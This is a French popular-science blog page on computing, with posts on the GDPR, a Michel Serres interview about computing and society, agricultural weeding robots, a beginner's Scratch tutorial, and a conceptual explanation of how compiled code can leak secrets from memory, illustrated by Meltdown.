Catégorie : Numérique

  • Reprenons la maîtrise de nos données !!

    Une date : le 25 mai et une multitude d’évènements pour la Fête des Libertés Numériques.

    Ce jour là, le règlement général sur la protection des données (RGPD), qui constitue le texte de référence européen en matière de protection des données à caractère personnel sera applicable dans l’ensemble des 28 États membres de l’Union européenne.

    Le RGPD renforce et unifie la protection des données pour les individus au sein de l’Union européenne.

    Plus d’information sur le RGPD, avec les éléments de la CNIL et l’article très complet de Wikipedia.

    Et donc….

    Le 25 mai prochain affirmons nos libertés numériques !

    Pour tout savoir sur la fête du numérique, inscrire un évènement, voir les évènements autour de chez vous : c’est ici.

     

  • Les mutations du cognitif

    Un nouvel « Entretien autour de l’informatique ». Serge Abiteboul et Gilles Dowek interviewent Michel Serres, philosophe, historien des sciences et homme de lettres, membre de l’Académie française. Michel Serres revient sur un thème qui lui est cher, les mutations du cognitif, qu’il a déjà par exemple développé dans Petite Poucette, un immense succès d’édition (Le Pommier, 2012). Cet article est publié en collaboration avec TheConversation.

    Michel Serres, professeur, auteur, membre de l’Académie Française, © Manuel Cohen

    B : Vous avez écrit sur la transformation de l’individu par l’informatique. C’est un sujet qui intéresse particulièrement Binaire.

    MS : Cette transformation se situe dans un mouvement très ancien. Avec l’écriture et l’imprimerie, la mémoire s’est externalisée, objectivée. L’informatique a poursuivi ce mouvement. Chaque étape a été accompagnée de bouleversements des sciences. L’informatique ne fait pas exception. Pour la connaissance, nous avons maintenant un accès universel et immédiat à une somme considérable d’information. Mais l’information, ce n’est pas encore la connaissance. C’est un pont qui n’est pas encore bâti. La connaissance est le prochain défi pour l’informatique. À côté de la mémoire, une autre faculté se transforme : l’imagination, c’est-à-dire la capacité à former des images. Perdons-nous la faculté d’imaginer avec toutes les images auxquelles nous avons accès sur le réseau ? Ou découvrons-nous un autre rapport à l’image ? Quant au raisonnement, certains logiciels résolvent des problèmes qui nous dépassent. Mémoire, imagination, raisonnement, nous voyons bien que toute notre organisation cognitive est transformée.

    B : Au-delà de l’individu, l’informatique transforme toute la société.

    MS : Je commencerais volontiers par les métiers. L’organisation sociale précédente, était fondée sur la communication et sur la concentration. Pour la communication, pensons aux métiers d’intermédiaires, de la « demoiselle du téléphone » au commerçant. Pour la concentration, pensons aux villes – concentrations de personnes et de pouvoir –, aux bibliothèques – concentration de livres, etc. L’informatique transforme ces deux éléments fondamentaux de nos sociétés. Pour la communication, nous assistons à la disparition des intermédiaires. Quant à la concentration, elle cède la place à la distribution. Par exemple, la monnaie émise par les banques centrales, concentration, sont remplacées par les crypto-monnaies, distribution.

    Le lien social a également été profondément transformé. Par exemple, le nombre d’appel le plus important sur un téléphone portable, sont les appels des mères aux enfants. Cela bouleverse les relations familiales. Ce qui a changé également c’est que nous pouvons contacter n’importe qui, n’importe quand, la distance est donc abolie et nous sommes passés d’un espace métrique à un espace topologique. Nous interagissions avant avec les gens qui vivaient près de chez nous. Nous sommes devenus les voisins de tous ceux que nous retrouvons sur le réseau, même s’ils sont au bout du monde. Ça change toute la société qui est bâtie sur des relations.

    Des habitants de Westchester en route vers la ville de New York, 1955. Photo de Guy Gillette

    B : Est-ce que vous y voyez une intensification des liens sociaux ?

    MS : Quantitativement c’est certain. On dit que les gens sont isolés, collés à leur téléphone portable. Quand j’étais jeune et que je prenais le métro, je n’étais pas en relation avec mes voisins. Maintenant, je suis au téléphone, je suis en relation avec quelqu’un. Contrairement à ce qu’on dit, je suis moins seul… Je parlais de solitude. Il faut distinguer entre la solitude et le sentiment d’appartenance. Avant l’informatique, on se disait français, chinois, gascon, breton, chrétien, etc.  C’étaient nos appartenances, qui se sont construites dans un monde qui ne connaissait pas l’informatique. Par exemple, nous vivons encore dans des départements découpés pour que nous puissions aller du chef-lieu n’importe où en une journée de cheval. Cela n’a plus aucun sens.

    Ces groupes se sont presque tous effondrés. L’informatique nous oblige à construire de nouvelles appartenances. C’est ce qui fait le succès des réseaux sociaux. Nous cherchons aveuglément de nouveaux groupes.

    B : Le réseau social d’une personne était naguère déterminé par son voisinage. Aujourd’hui, on peut choisir des gens qui nous ressemblent. N’existe-t-il pas un risque de s’enfermer dans des appartenances ?

    MS : Oui. Mais cela augmente nos libertés. Les aristocrates qui se rencontraient disaient « Bonjour, mon frère », ou « mon cousin ». Un aristocrate s’est adressé à Napoléon en lui disant, « Bonjour, mon ami », pour insister sur le fait que Napoléon ne faisait pas partie de l’aristocratie. Napoléon lui a répondu : « On subit sa famille, on choisit ses amis. »

    Non, le risque principal des réseaux sociaux aujourd’hui, ce n’est pas l’enfermement, ce sont les bobards, les rumeurs, les fausses nouvelles. Nous avons vu les dangers énormes de rumeurs, de haine. Voilà, nous avons un problème sérieux.

    Nous ne savons pas encore mesurer les effets de ces bobards. Les bobards ont-ils déterminé l’élection de Donald Trump ? Mais la question est plus générale. Ce que nous  savons, c’est qu’il y a eu Trump, le Brexit, Poutine, Erdogan, etc. La cause de cette vague vient de la peur que les gens ont du monde qui nous arrive. Et cela est en partie la faute de l’informatique. Nous autres, héritiers des lumières du XVIIIe siècle, nous avions une confiance presque absolue, trop forte peut-être, dans le progrès. Ces événements nous rappellent que tout progrès a un coût. C’est le prix à payer pour l’accès universel à toute l’information. Tout moyen de communication est à la fois la meilleure et la pire des choses. Il faut vivre avec cela.

    Cela donne une idée de la morale nouvelle. Monsieur Bush a parlé de l’axe du mal comme s’il y avait Saint-Georges d’un côté et de l’autre le dragon. Mais, dès que l’on combat le mal, on devient le mal et Saint-Georges se transforme en dragon. Le mal est intimement mélangé au bien. Cela donne une sorte de philosophie du mélange. Leibniz a un mot là-dessus : un accord de septième, une dissonance bien placée peut donner à une composition quelque chose de bien supérieur à l’accord parfait.

    Michel Serres © Plantu (Merci Michel et Plantu)

    B : Dans cette société qui se transforme, ne faut-il pas également que la politique se transforme ?

    MS : vous avez raison. Nous avons connu une bascule de culture énorme du fait des sciences dures, de la physique, la chimie, la médecine, etc. et de l’informatique bien sûr. Ces transformations ont été conditionnées par les sciences dures, moins par les sciences humaines. Pourtant ceux qui nous gouvernent sont surtout formés aux sciences humaines. C’est une catastrophe dont on ne mesure pas l’ampleur. Le décideur, le journaliste… ceux qui ont la parole, en savent peu sur les sciences dures. C’est très dangereux du fait que la politique doit être repensée en fonction du monde contemporain. Ils ne peuvent pas continuer à décider de choses qu’ils ne comprennent plus.

    On le voit tous les jours. Dernièrement, Laurent Fabius m’a invité pour La nuit du droit, avec une très grande partie réservée à l’environnement. Il y avait des juristes, des philosophes, des sociologues, etc., pas un savant. J’ai dit à Fabius : nous allons décider de choses que nous ne comprenons pas. Oh, nous avons des informations, me répondit-il. Vous avez des informations, mais vous n’avez pas la connaissance !

    B : Et le citoyen qui vit ces crises ?

    MS : Le citoyen vit un monde tout à fait nouveau, mais il est dirigé par des gens qui viennent de mondes complètement anciens. Donc, même s’il ne comprend pas ce qu’il vit, le citoyen est déchiré. Les crises politiques que nous traversons viennent de là. Elles sont fondamentalement épistémologiques. On construit, au nord de Paris, un Campus Condorcet exclusivement consacré aux sciences humaines. L’université de Saclay, au Sud, est principalement consacrée aux sciences dures. On met des dizaines de kilomètres entre les deux. Cultivés ignorants ou savants incultes. La tradition philosophique était exactement l’inverse.

    B : Cette séparation nous désespère autant que vous. Mais il semble qu’il y ait une prise de conscience, qu’on commence à ressentir le besoin de faire sauter ces frontières ?

    En période de crise, les problèmes majeurs sont tous interdisciplinaires. Le gouvernement est partagé en spécialités. Prenez le chômage. Il touche le travail, l’éducation, l’agriculture… Un gouvernement en petits morceaux ne peut plus résoudre ces problèmes interdisciplinaires.

    Nous sommes des scientifiques qui continuons une route qui a conduit à l’informatique avec Turing. Nous avons l’idée d’une histoire, d’un progrès. Gouverner, ça veut dire tenir le gouvernail, savoir où on est, d’où on vient, où on va. Aujourd’hui, il n’y a plus de cap, uniquement de la gestion. Il n’y plus de gouvernement parce qu’il n’y a plus d’histoire. Et il n’y a plus d’histoire parce qu’il n’y a plus de connaissance des sciences. Ce sont les sciences dures qui ont fait le monde moderne, pas l’histoire dont parlent les spécialistes de sciences humaines. Il faut conjuguer les deux. L’informatique a un rôle essentiel à jouer, y compris pour transformer les sciences humaines.

    Des informaticiens doivent apprendre à devenir un peu sociologues, un peu économistes, etc. Et les chercheurs en sciences humaines doivent devenir un peu informaticiens. C’est indispensable d’avoir les deux points de vue pour plonger dans le vrai monde.

    B : Peut-être pourrions-nous conclure sur votre vision de cette société en devenir ?

    C’était mieux avant; Le Pommier

    MS : La dernière révolution industrielle a généré des gâchis considérables. Par exemple, on a construit des masses considérables de voitures qui sont utilisées moins d’une heure par jour. Je ne partage pas le point de vue de Jeremy Rifkin qui parle de l’informatique comme d’une nouvelle révolution industrielle. La révolution industrielle accélère l’entropie, quand la révolution informatique accélère l’information. C’est très différent.

    Une autre différence avec une révolution industrielle tient du travail. À chaque révolution industrielle, des métiers ont disparu, et d’autres ont été inventés. Les paysans, par exemple, sont devenus ouvriers. Il est probable que l’informatique détruira beaucoup plus d’emplois qu’elle n’en créera. Nous n’avons pas les chiffres parce que la révolution est en marche, mais il faut s’y préparer. Dans la société d’hier, un homme normal était un ouvrier, un travailleur. Ce ne sera plus le cas dans celle de demain. C’est aussi en cela que nous ne sommes pas dans une révolution industrielle.

    Le travail était une valeur essentielle. Dans la société de demain, peut-être dans cinquante ans, le travail sera une activité rare. Il nous faut imaginer une société avec d’autres valeurs. Le plus grand philosophe de notre siècle sera celui qui concevra cette nouvelle société, la société de l’otium, de l’oisiveté. Qu’allons-nous faire de tout le temps dont nous disposerons ?

    Serge Abiteboul, Inria & ENS, Paris, Gilles Dowek, Inria & ENS Paris Saclay

    Pour aller plus loin, nous ne pouvons que vous conseiller la lecture de Michel Serres, et notamment de Petite Poucette, Le Pommier. Vous pouvez aussi écouter la conférence lumineuse qu’il a donnée pour les 40 ans d’Inria.

  • Et les robots binaient…

    On entend de plus en plus souvent parler de robotique, et dans la plupart des cas, elle est mise en œuvre dans des environnements industriels ou médicaux. Et pourtant, il existe beaucoup d’autres secteurs où les robots sont désormais réalités. Dans cet article, nous vous présentons un exemple dans le domaine de l’agriculture. Serge Abiteboul & Tom Morisse

    De l’asperge aux vignes

    L’aventure de Naïo Technologies commence en 2010, pendant la Fête de l’asperge de Pontonx-sur-l’Adour, dans les Landes, ça ne s’invente pas ! Gaëtan Séverac, l’un des deux cofondateurs, discute avec un agriculteur. Ce dernier est confronté à un épineux dilemme lors des récoltes : soit faire appel à une main d’œuvre saisonnière conséquente, mais difficile à trouver, soit utiliser des machines qui ramassent tout, mûr ou pas.

    Gaëtan fait part de cette rencontre à Aymeric Barthes, un camarade de l’IMERIR, une école d’ingénieurs de Perpignan justement spécialisée dans la robotique. Ils se prennent de passion pour ce défi technique pas évident à l’époque, car le lien entre robotique et agriculture pouvait alors paraître bien lointain. On ne connaissait pas encore les tracteurs bourrés de capteurs, d’électronique, et de programmes informatiques.

    OZ2, Naïo Technology

    En parallèle de leurs fins d’études respectives, un apprentissage pour Aymeric et une thèse sur la communication des robots dans l’espace à l’ONERA pour Gaëtan, ils conçoivent leurs premiers prototypes. Le projet prend de l’ampleur et en novembre 2011, ils créent la société Naïo Technologies. Ils ont légèrement transformé le projet : comme réaliser un robot récolteur d’asperges nécessiterait un budget trop conséquent, ils se concentrent sur le désherbage, en visant d’abord de petits maraîchers diversifiés, surtout présents en circuits courts. Aboutissement de leurs efforts, le robot désherbeur Oz est commercialisé en 2013.

    6 ans plus tard, la jeune pousse a bien grandi : l’équipe compte aujourd’hui une trentaine de personnes. La moitié se concentre sur la R&D logicielle et matérielle, un quart sur le support client, et le reste sur l’administration et la production. Naïo Technologies s’occupe de la conception et de l’assemblage dans son propre atelier. On pourrait s’attendre à des prestataires en Chine, mais ils choisissent le made in France plutôt local ; ils ont bien raison : comment résister au charme de villes telles que Montauban, Castres, ou encore Nantes ?

    Dino, Naïo Technology

    Si Naïo Technologies est toujours focalisée sur le désherbage, la gamme s’est élargie pour apporter des solutions à d’autres pans de l’agriculture. Ainsi, aux côtés d’Oz, on trouve  aujourd’hui Dino, robot enjambeur pour des exploitations légumières de plus grande taille, et Ted, qui accomplit son office au cœur des vignes. La startup compte à ce jour une centaine de robots en circulation, essentiellement des modèles Oz et quelques Dino, dont, cocorico oblige, déjà 15% du parc à l’international.

    Sous le capot

    Leurs robots sont équipés de nombreux capteurs : centrale inertielle (équivalent de l’oreille interne chez les humains), un LIDAR (qui, à la manière d’un radar mais cette fois-ci via un laser, sonde son environnement avec une ouverture de vision à plus de 200°), deux caméras en stéréo, pour détecter les couleurs et percevoir le monde en 3D, et enfin un GPS précis à 3 cm près.

    Fort de ses 1m50 x 50cm d’envergure et de ses 100 kilos, Oz est spécialisé dans le binage. Ce qui, pour le néophyte, signifie retourner la terre sur 2 à 3 cm, pour désherber. Paradoxalement, Oz est incapable de reconnaître les mauvaises herbes : on bine précisément pour ne pas leur laisser le temps de sortir du sol. Ce que Oz perçoit en revanche, ce sont les cultures dont il passe entre les rangées. En fait, chaque robot construit sa propre carte de l’exploitation au fur et à mesure. Et si la culture n’a pas encore émergé, restant du coup indistincte de la terre à désherber, l’agriculteur doit passer en guidage manuel.

    Tien Tran, Naïo Technology

    Il faut savoir gérer les situations difficiles et imprévues. D’abord, le robot doit détecter la présence d’obstacle(s). Il peut soit l’éviter si la place le permet, soit s’avancer jusqu’au contact. S’il détecte que l’obstacle est rigide, il bippe très fort, pour faire fuir l’animal au cas où. Ensuite, il doit gérer sa propre « désorientation ». Si la centrale inertielle décèle un problème, par exemple après un choc en roulant sur une pierre ou si les caméras détectent que le robot se trouve dans la culture, Oz s’arrête et il prévient son patron (l’agriculteur) par SMS.

    Si un problème est survenu, Naïo Technologies peut récupérer les données d’observation (en informatique, on parle de logs) de la dernière heure d’usage du robot, pour mieux la rejouer sur simulateur. L’analyse de ces données pourrait permettre d’ajouter de nombreuses fonctionnalités, notamment en s’appuyant sur des techniques d’apprentissage automatique. Mais ce n’est pas encore à l’ordre du jour…

    Malgré tous les garde-fous prévus, des situations cocasses peuvent tout de même se produire. Aymeric raconte avec le sourire : « L’exploitation d’un client était entourée de fossés, et on se disait que le pire qui puisse arriver au robot, c’était de se retrouver dedans. Pas de bol. Le robot a fini sur la route. » Il s’est trouvé dans la rangée de culture qui menait vers le seul pont qui y conduisait. Le robot a cru qu’il était juste dans un trou de culture et il a donc continué son bonhomme de chemin pour retrouver cette culture. Il a bien fini par reconnaître qu’il n’y avait plus rien à biner mais il était déjà au beau milieu de la chaussée. Si vous croisez un robot bineur sur une départementale, dites-vous qu’il ne se balade pas ; il est juste perdu !

    Une écologie pragmatiste

    Trois avantages sont avancés pour convaincre les agriculteurs de faire appel à leurs robots : l’amélioration des conditions de travail, l’accroissement de la rentabilité et l’impact vertueux sur l’environnement par réduction de l’utilisation des herbicides. En fait, les clients de Naïo Technologies recherchent surtout jusqu’ici un gain de temps ou une réduction de la pénibilité de leur travail… justement parce que nombre d’entre eux sont déjà installés dans l’agriculture bio ou raisonnée.

    Les dirigeants de la startup nous ont paru soucieux des impacts écologiques et sociétaux de leur technologie. Nous avons cuisiné Aymeric Barthes car les sorties de route potentielles ne manquent pas : les robots peuvent être utilisés pour répandre des produits chimiques,  la mécanisation peut conduire à la disparition d’emplois, et favoriser une concentration toujours plus forte des exploitations dans les mains de ceux qui possèdent des machines. Naïo Technologies ne risque-t-elle pas de vendre son âme au diable ?

    9504, Naïo Technology

    Réponse d’Aymeric : « Nous croyons à une agriculture plus saine. Lorsque nous avons commencé, nous nous sommes posés la question de savoir si nous ne faisions pas que déplacer le problème. Notre vision est que la marche du progrès est inéluctable  alors autant y participer, en promouvant nos valeurs, et en proposant aux agriculteurs une alternative aux produits chimiques. Et jusqu’à maintenant, aucun de nos clients n’a licencié qui que ce soit. »

    Il faut reconnaître que Naïo Technologies fait vivre ses valeurs : management consultatif, maintien d’une version pédagogique de leurs robots, ouverture de leur capital lors de campagnes de financement participatif sur Wiseed, ou encore organisation du Forum international de la robotique agricole, en donnant également de la visibilité à ses concurrents.

    Perspectives

    Plusieurs axes de développement s’offrent aujourd’hui à la société. Tout d’abord la création de robots adaptés à d’autres cultures, par exemple d’autres cultures spécialisées. Ensuite, il faudrait permettre la collaboration entre plusieurs robots, un besoin qui n’existait pas chez les premiers clients, des petites exploitations, mais qui se fait de plus en plus ressentir. D’autres secteurs pourraient être intéressés par leur expertise robotique comme le désherbage de parc électrique ou, plus inattendu, le carottage pour des stations de ski. Dans ce dernier cas, les résultats ont été pour le moins mitigés, le robot dévalait les pentes tout schuss malgré ses chenilles. On pourrait citer d’autres sollicitations surprenantes auxquelles ils n’ont pas donné suite : un robot-ramasseur de balles de golf, ou encore un robot-carreleur. Nous aimerions aussi disposer de robot qui s’occupe des plantes du balcon ; pensons aussi aux agriculteurs-citadins.

    SpaceX Falcon 9 FLT-002 101208

    S’il y a bien une application qui fait rêver les deux fondateurs, c’est la conquête spatiale. Les deux fondateurs ont tenté de contacter Elon Musk, mais sans succès. Ils ne désespèrent pas d’envoyer un jour leurs robots dans l’espace. Après tout, le comble serait bien pour eux de se débiner.

    Serge Abiteboul, Inria & ENS et Tom Morisse, Fabernovel

  • Viens : on va apprendre à programmer !

    Tout le monde sait faire du Scratch maintenant … euh vous pas vraiment ? Pourtant le professeur de français profite de l’apprentissage du code pour faire réaliser des narrations interactives aux enfants afin de les rendre actifs par rapport à l’apprentissage de la rédaction, la professeure de mathématiques donne des exercices beaucoup plus attrayants, et au centre de loisirs votre fille a créé un jeu et votre fils une petite animation artistique. Bon il faudrait vous y mettre, mais … vous n’avez que peu de temps . Ça tombe bien la solution est par ici … Pascal Guitton et Thierry Viéville.

    A – Découvrez Scratch et réalisez une carte postale animé

    Action 1 – Créez-vous un compte sur Scratch

    Rendez-vous sur scratch.mit.edu pour créer votre compte (je vous conseille d’ouvrir Scratch dans un nouvel onglet, vous allez passer pas mal de temps sur cet outil au cours de ces deux premiers chapitres). Si vous avez un souci, n’hésitez pas à regarder la vidéo pas-à-pas.

    Niveau 1 – Premier défi : Il doit arriver quelque chose au chat ! Allez-y, n’ayez pas peur, explorez, jouez avec les blocs.

    Maintenant que vous avez créé votre compte sur Scratch et vu à quoi ressemble l’interface, je vous propose un premier défi. Prenez trois minutes pour jouer avec les blocs, votre seul objectif : il doit arriver quelque chose au chat. C’est parti ! Je vous attends pour la suite.

    Action  2 – Découvrez l’interface de Scratch

    Niveau 1 – Deuxième défi : Faites avancer le chat tout seul… indéfiniment.

    Indice : vous vous dites qu’il existe sûrement un bloc qui permet de faire ça, et vous avez raison ! Avez-vous trouvé lequel ? Et si vous regardiez dans la catégorie “Contrôle” ?

    Action 3 – Prenez le contrôle du petit chat.

    Et pour être sûr-e de vos connaissances, regardez cette page tutorielle du module de formation Class’´Code d’où cette initiation est extraite.

    Niveau 1 – Troisième défi : Créez une petite carte postale animée pour vous présenter.  À vous de faire ce que vous souhaitez créer

    Besoin d’aide ? Voici quelques pistes proposées par Magic Makers

    Un exemple de portrait ?

    Vous avez fini ? Et si vous aussi vous appreniez à partager votre création ?

    Action 4 – Partagez votre programme

     

    Niveau 1 – Quatrième défi : Partager ! Maintenant il ne vous reste qu’à ajouter votre projet au Studio Class’Code/FTV  https://scratch.mit.edu/studios/1945619 pour le partager et retrouvez ceux des autres !

    Ici, on crée un Studio dédié pour les jeunes sur le modèle de https://scratch.mit.edu/studios/1945619

    Et voilà ! Vous venez de créer votre premier programme. Pour cela vous avez conçu un algorithme, c’est à dire une suite d’instructions  précises que vous avez codé grâce à un langage, ici les blocs de Scratch, afin que l’ordinateur puisse l’exécuter.

    Niveau 1 – Question : Mais au fait, savez-vous d’où vient le mot Algorithme ? Et comment l’expliquer à votre entourage ?

    Action 5 – Prendre du recul : l’histoire des algorithmes  

    Coder, comme vous venez de le faire avec Scratch, c’est tout simplement le fait de donner des instructions précises à l’ordinateur (avec les différents blocs de Scratch par exemple), qu’il devra ensuite exécuter pour donner le résultat que vous souhaitiez obtenir (votre portrait !). Coder est donc l’activité qui permet de voir se concrétiser ses idées. Mais rien n’empêche ces idées de naître et de mûrir en dehors de toute forme de programmation (et donc même sans ordinateur !), en utilisant simplement le raisonnement comme moteur principal.

    Allez … on passe au niveau 2 ?

    B – Créez votre histoire interactive

    Action 6 – Changez de décor  

     

    Niveau 2 – Votre premier défi : Voici mon héros !
    Choisissez un héros dans la bibliothèque de lutin ou créez le vôtre et présentez-le sur le modèle de la carte postale animée ;
    Maintenant, votre héros part à l’aventure ! Faites-le changer de décor…

    Ensuite ? Prenons un deuxième lutin. Après que le premier lutin a fait basculer l’arrière-plan, votre deuxième lutin doit faire une action (provoquée par le changement d’arrière-plan donc).

    Avez-vous réussi ? Une manière parmi d’autres de relever le défi se trouve dans la vidéo.

    Action 7 – Posez vos conditions

    Niveau 2 – Deuxième défi : La rencontre.
    En route votre héros rencontre un étrange personnage : Posez un autre lutin sur la scène.
    Si votre héros le touche alors quelque chose se produit.  Mais quoi ? A vous de décider ! Et si votre héros ne le touche plus ?

    Vous pouvez aussi vous appuyer sur ce tutoriel qui fait découvrir de nouvelles instructions.

    Action 8 – Synchronisation

    Vous êtes à présent capables de provoquer des interactions entre vos personnages et vos décors, en utilisant des conditions. Allons encore plus loin dans ces interactions, avec la notion de synchronisation.

    Niveau 2 – Troisième défi : Le dialogue s’engage.
    Il s’ensuit un long dialogue entre le héros et cet étrange personnage et peut être de nouvelles aventures.
    À vous de nous raconter en veillant à ce qu’ils ne se coupent pas la parole ;-).

    Niveau 2 – Quatrième défi : Partager ! N’hésitez pas à partager votre aventure sur le Studio Class’CodeFTV  https://scratch.mit.edu/studios/1945619

    Niveau 2 – Question : Mais au fait, savez-vous qui a écrit le tout premier programme ?
    [ ] Alan Turing
    [ ] Al Kwarizmi
    [ ] Ada Lovelace

    Action 9 –  Prendre du recul : Mais qui a écrit le premier programme ?

    Cette mathématicienne a vu dans la machine analytique tout le potentiel d’un ordinateur. Non seulement son côté universel, capable d’exécuter tout ce qu’on sera capable de lui décrire, mais aussi l’impact qu’une telle machine pourrait avoir sur la société. Ada Lovelace s’est tellement passionnée pour cette machine et son potentiel, qu’elle sera la première à lui écrire un programme.

    Allez, on passe au niveau 3 ?

    C – Créez votre premier jeu !

    Action 10 –  Contrôler votre héros avec les flèches du clavier

    Pour commencer, apprenons à interagir avec le clavier, comme les premiers jeux informatiques avant l’utilisation de la souris 🙂 Nous avons aussi quelques éléments tutoriels sur l’usage du clavier.

    Niveau 3 – Premier défi : avancer dans le labyrinthe.
    Votre héros est maintenant bloqué au fond d’un labyrinthe, à vous de le dessiner.
    Écrivez ensuite un programme pour que vous puissiez l’aider à en sortir avec les flèches du clavier.
    Attention, s’il touche un mur, alors il ne peut pas avancer.

    Indice : vous pouvez utiliser le bloc “si couleur touchée” pour identifier les murs du labyrinthe.

    Un exemple : voici un labyrinthe à jouer et à remixer : https://scratch.mit.edu/projects/98866892

    Action 11 –  Ajouter un niveau de labyrinthe

     

    Niveau 3 – Deuxième défi : passer au niveau 2 !

    Lorsque votre héros arrive à la sortie alors il change de décor et se retrouve dans un nouveau labyrinthe : Niveau 2 !

    Vidéo 12 –  Comptez les niveaux du labyrinthe

    Une variable, c’est un peu comme une boîte : on peut y ranger des choses du même type à l’intérieur – comme des chaussettes par exemple. Selon la manière dont on va utiliser les objets à l’intérieur de la boîte, il pourra y en avoir plus ou moins – on peut enlever des chaussettes de la boîte le matin, et en remettre en fin de semaine après la lessive. Le nombre à l’intérieur de cette boîte peut donc être modifié tout au long de votre programme et selon les actions provoquées : il est variable.

    Niveau 3 – Troisième défi : ajouter un nouveau bloc supplémentaire qui va compter les niveaux pour nous ! 

    Niveau 3 – Quatrième défi : Partager ! N’hésitez pas à partager votre labyrinthe sur le Studio Class’CodeFTV https://scratch.mit.edu/studios/1945619

    Niveau 3 – Question : Est-il possible d’écrire un programme pour que votre héros sorte de tous les labyrinthes du monde ? C’est une question difficile, cherchez juste une première réponse générale.

    Action13 – Comment gagner à tous les coups grâce aux algorithmes ?

    Niveau 3 Activité – Et maintenant gagnez !
    Matériel : 16 allumettes (ou crayon, caillou, etc) + un adversaire ou si vous n’en avez pas cliquez ici https://scratch.mit.edu/projects/91143670/ – fullscreen
    Essayez de mettre au point une stratégie gagnante !

    Vous avez pu trouver ? La réponse est donnée ici.

    Et ces activités sans ordinateur avec les objets du quotidien, c’est aussi de l’informatique ! Plus de tours de magie sans ordinateur ? Allons  regarder Marie nous en proposer.

    D – Conclusion.

    Tout le monde sait faire du Scratch maintenant … et vous ? aussi !

    S’auto-évaluer. Comment partager des critères liés à la démarche de programmation (planifier, tester et bonifier le programme sous une approche itérative…) ? Voici une grille d’autoévaluation, pourquoi ne pas s’inviter sur le site pour s’autoévaluer pendant ou après nos premières créations ? C ‘est par ici …

    Reste maintenant le plus difficile et le plus passionnant … parce que apprendre à coder ne sert à rien … si cela ne sert à rien : alors vous à quoi cela va-t-il vous servir ?

    Liliane Khamsay, Florent Masseglia et Claude Terosier autrices du parcours « découvrir la programmation créative » de https://classcode.fr

    Note: Toutes ces ressources créées sur la plateforme OpenClassrooms avec la société MagicMakers dans le cadre de ce projet soutenu par le Programme d’Investissement d’Avenir sont librement réutilisables comme on le voit ici (licences Creative-Commons).

  • Est-ce que mon programme est bien protégé contre les cyberattaques?

    Garantir la sécurité d’un programme est un problème difficile. Cela n’est sûrement pas une nouvelle pour vous étant données toutes les cyberattaques dont on entend parler dans les journaux aujourd’hui (WannaCry, Attaque vers Yahoo, Petya, Cyberguerres, etc.). Ce que nous savons moins, c’est l’importance des langages de programmation (ces langages comme JavaScript qui permettent de créer des animations dans nos pages web) dans la sécurité de nos programmes. Pour découvrir cet aspect bien moins connu, donnons la parole à notre collègue Tamara Rezk. Pierre Paradinas et Pascal Guitton.

    Écrire du code sûr et s’assurer que celui-ci satisfait des propriétés de sécurité est nécessaire pour contrer d’éventuelles cyberattaques. Mais ce n’est pas suffisant. Encore faut-il que le programme qui sera exécuté par l’ordinateur soit sûr. Vous avez bien lu: écrire un programme sûr et s’assurer qu’il s’exécute de manière sûre sont deux choses bien distinctes.

    En effet, le code source dans lequel le développeur écrit son programme et le code qui s’exécute peuvent être très différents :

    © Tamara Rezk et dreamstime.com

    Dans cette figure, le code source écrit par le développeur se trouve en haut. En dessous, le code exécuté par l’ordinateur. Ce dernier est bien différent du code source : dans l’exemple c’est un code binaire, une séquence de 0 et de 1, généré par un compilateur.

    Nos smartphones, tablettes ou ordinateurs sont de gigantesques circuits électroniques dont il faut expliciter chaque opération. Les instructions qui pilotent ces circuits sont exprimées en « langage machine » qui est trop complexe pour être manipulé directement par un opérateur humain, alors on implémente nos algorithmes dans un langage plus facile à comprendre et à manipuler et qui peut être traduit automatiquement en langage machine. Le compilateur est l’outil logiciel qui effectue cette traduction comme le raconte l‘histoire de Grace Hopper ou presque. On parle d’interpréteur si cette traduction est faite pas à pas, la problématique étant la même ici.

    Un compilateur est donc un traducteur. Comment être sur que la traduction est correcte ? Des erreurs de traduction peuvent avoir des conséquences très importantes, par exemple lorsque deux présidents se parlent. Même si un président pèse bien son discours, comment être sur que le traducteur le retranscrit exactement ? Si vous lisez ce blog assidûment, vous avez déjà entendu parler de compilateurs corrects ou compilateurs sans bugs (cf. l’article datant de 2016 sur Xavier Leroy).

    A priori, on pourrait penser que lorsqu’un compilateur traduit correctement un programme, les propriétés de sécurité satisfaites par le code source le sont aussi par le code compilé. Malheureusement, ce n’est pas toujours le cas.

    En guise d’exemple, prenez un programme avec deux variables : la variable x, qui contient des données publiques, et la variable ncarte, qui contient des données confidentielles, par exemple votre numéro de carte bancaire. Lorsque le compilateur est correct, la séquence de 0 et de 1 correspond exactement aux valeurs de la variable x et de la variable ncarte dans le code source:

    © Tamara Rezk

    Cependant, même dans le cas d’un compilateur correct, notre code n’est pas protégé. Le fait que les variables x et ncarte soient l’une à côté de l’autre en mémoire dans le code binaire est une faille de sécurité. Le code de l’attaquant peut se trouver dans cet environnement. Ce code peut récuperer un pointeur vers la variable x car celle-ci est dans la zone publique de la mémoire. Grâce à la contigüité des variables x et ncarte dans la mémoire, il va pouvoir récupérer la valeur de la variable confidentielle, en regardant juste un cran plus loin dans la mémoire.

    © Tamara Rezk et wpclipart.com

    Par contre, si le compilateur avait placé la variable ncarte dans une partie protégée de la mémoire, l’attaquant n’aurait pas pu obtenir sa valeur. Sauf si …

    Sur l’importance de la mémoire protégée et l’attaque Meltdown.

    Vous voyez dans ce simple exemple que la valeur de ncarte est accessible par l’attaquant parce que sa valeur en mémoire n’est pas protégée par compilation. Un problème de sécurité tout a fait similaire, mais dans un contexte plus général et avec des causes différentes, est l’ attaque de Meltdown (voir article du Blog binaire ou celui sur Le Monde ). En effet, en général, un programme ne s’exécute pas tout seul : il partage son environnemment d’exécution avec d’autres programmes de manière orchestrée par le système d’exploitation qui lui aussi s’exécute sur la machine. La mémoire utilisée par notre programme est donc partagée avec son environnement. Quand plusieurs programmes s’exécutent en même temps dans un environnement, la mémoire protégée est une brique fondamentale pour la sécurité. Malheureusement cette brique fondamentale est vulnérable, parce que par exemple, dans l’attaque Meltdown, l’attaquant peut accéder à toute la mémoire, y compris la mémoire qui devrait être protégée (comme dans notre exemple). À la différence de notre exemple, la cause de cette vulnérabilité n’est pas les bugs de programmes, ni les compilateurs, ni le système de exploitation. La cause principale est dans le hardware, et en particulier dans les processeurs Intel –et potentiellement d’autres.

